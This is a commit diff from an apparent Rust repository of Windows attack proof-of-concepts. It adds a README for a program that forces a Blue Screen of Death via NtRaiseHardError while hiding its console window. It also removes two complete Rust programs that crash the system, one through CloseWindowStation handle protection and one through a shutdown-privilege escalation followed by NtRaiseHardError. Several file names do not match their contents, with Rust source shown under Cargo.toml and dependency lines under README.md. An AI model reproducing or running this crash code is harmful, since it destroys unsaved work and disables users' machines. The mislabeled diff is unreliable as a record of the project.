Changing Repo Structure

Writing PoC for Each Technique and keeping it structured

Author: Whitecat18

BSOD/bsod_NtRaiseHardError/README.md

@@ -0,0 +1,38 @@
+# BSOD NtRaiseHardError
+
+This Rust program demonstrates how to trigger a Blue Screen of Death (BSOD) using NtRaiseHardError with random error codes.
+
+## Features
+- Hides the console window
+- Sets process priority to high
+- Enables shutdown privileges using RtlAdjustPrivilege
+- Generates random BSOD error codes
+- Triggers BSOD using NtRaiseHardError
+- Shows error message in case of failure
+
+## Dependencies
+- winapi
+- ntapi
+
+## Usage
+1. Build the project:
+```bash
+cargo build --release
+```
+
+2. Run the executable:
+```bash
+cargo run --release
+```
+
+## Technical Details
+- Uses RtlAdjustPrivilege to enable shutdown privileges (privilege ID: 19)
+- Generates random error codes in the format: 0xC000_0000 | ((random & 0xF00) << 8) | ((random & 0xF0) << 4) | (random & 0xF)
+- Sets process priority to HIGH_PRIORITY_CLASS
+- Hides the console window using ShowWindow with SW_HIDE
+
+## Warning
+This program is for educational purposes only. Running it will cause your system to crash with a Blue Screen of Death.
+
+## Author
+@5mukx 

BSOD/closewindowstation/Cargo.lock

@@ -4,4 +4,3 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
-winapi = { version = "0.3", features = ["winuser", "winbase", "handleapi", "wincon"] }

BSOD/closewindowstation/Cargo.toml

@@ -1,40 +1,3 @@
-/*
-    Trigger BSOD Using CloseWindowStation()
-    @5mukx
-*/
-
-use std::ptr::null_mut;
-
-use winapi::{
-    ctypes::c_void,
-    shared::{minwindef::HWINSTA, windef::HWND},
-    um::{
-        handleapi::SetHandleInformation,
-        minwinbase::SECURITY_ATTRIBUTES,
-        winbase::HANDLE_FLAG_PROTECT_FROM_CLOSE,
-        wincon::GetConsoleWindow,
-        winuser::{CreateWindowStationA, ShowWindow, SW_HIDE},
-    },
-};
-
 fn main() {
-    unsafe {
-        let hwnd: HWND = GetConsoleWindow();
-        ShowWindow(hwnd, SW_HIDE);
-
-        let dwaddr: u32 = 0x80000000 | 0x40000000;
-
-        let hwinsta: HWINSTA = CreateWindowStationA(
-            "WindowStation\0".as_ptr() as *const i8,
-            0,
-            dwaddr,
-            null_mut() as *mut SECURITY_ATTRIBUTES,
-        );
-
-        SetHandleInformation(
-            hwinsta as *mut c_void,
-            HANDLE_FLAG_PROTECT_FROM_CLOSE,
-            HANDLE_FLAG_PROTECT_FROM_CLOSE,
-        );
-    }
+    println!("Hello, world!");
 }

BSOD/closewindowstation/README.md

@@ -4,5 +4,3 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
-winapi = { version = "0.3", features = ["processthreadsapi", "securitybaseapi", "winbase", "winnt", "errhandlingapi"] }
-ntapi = { version = "0.4", features = ["ntexapi"] }

BSOD/closewindowstation/src/main.rs

@@ -1,67 +1,3 @@
-/*
-    Program to invoke BSOD setting up privileges and provoking NtRaiseHardError. 
-    @5mukx
-*/
-
-use std::ptr;
-use ntapi::ntexapi::NtRaiseHardError;
-use winapi::shared::ntstatus::STATUS_ASSERTION_FAILURE;
-use winapi::shared::wtypesbase::ULONG;
-use winapi::um::processthreadsapi::GetCurrentProcess;
-use winapi::um::processthreadsapi::OpenProcessToken;
-use winapi::um::securitybaseapi::AdjustTokenPrivileges;
-use winapi::um::winnt::{LUID, SE_PRIVILEGE_ENABLED, SE_SHUTDOWN_NAME, TOKEN_ADJUST_PRIVILEGES, TOKEN_PRIVILEGES, TOKEN_QUERY};
-use winapi::um::winbase::LookupPrivilegeValueA;
-use winapi::um::errhandlingapi::GetLastError;
-use std::ffi::CString;
-
 fn main() {
-    println!("Press any key to trigger a BSOD.");
-    let mut input = String::new();
-    std::io::stdin().read_line(&mut input).unwrap();
-
-    unsafe {
-        let mut token_handle: winapi::um::winnt::HANDLE = ptr::null_mut();
-        if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &mut token_handle) == 0 {
-            println!("Failed to open process token.");
-            return;
-        }
-
-        let mut luid: LUID = LUID { LowPart: 0, HighPart: 0 };
-        let shutdown_privilege = CString::new(SE_SHUTDOWN_NAME).unwrap();
-        if LookupPrivilegeValueA(ptr::null(), shutdown_privilege.as_ptr(), &mut luid) == 0 {
-            println!("Failed to lookup privilege value. Error: {}", GetLastError());
-            return;
-        }
-
-        let tp: TOKEN_PRIVILEGES = TOKEN_PRIVILEGES {
-            PrivilegeCount: 1,
-            Privileges: [winapi::um::winnt::LUID_AND_ATTRIBUTES {
-                Luid: luid,
-                Attributes: SE_PRIVILEGE_ENABLED,
-            }],
-        };
-
-        AdjustTokenPrivileges(token_handle, 0, &tp as *const _ as *mut _, 0, ptr::null_mut(), ptr::null_mut());
-
-        if GetLastError() != 0 {
-            println!("Failed to adjust token privileges. Error: {}", GetLastError());
-            return;
-        }
-
-        // Raise hard error
-        let mut response: ULONG = 0;
-        let status = NtRaiseHardError(
-            STATUS_ASSERTION_FAILURE,
-            0,
-            0,
-            ptr::null_mut(),
-            6,
-            &mut response
-        );
-
-        if status != 0 {
-            println!("Failed to raise hard error. Status: {}", status);
-        }
-    }
+    println!("Hello, world!");
 }

BSOD/lookupprivilegevalue/Cargo.lock

@@ -4,4 +4,4 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
-winapi = { version = "0.3", features = ["wincon", "tlhelp32", "handleapi", "winuser"] }
+winapi = { version = "0.3.9", features = ["handleapi", "winbase", "winuser", "winnt", "wincon", "tlhelp32"] }

BSOD/lookupprivilegevalue/Cargo.toml

@@ -4,5 +4,3 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
-winapi = { version = "0.3", features = ["processthreadsapi", "securitybaseapi", "winbase", "winnt", "errhandlingapi"] }
-ntapi = { version = "0.4", features = ["ntpsapi"] }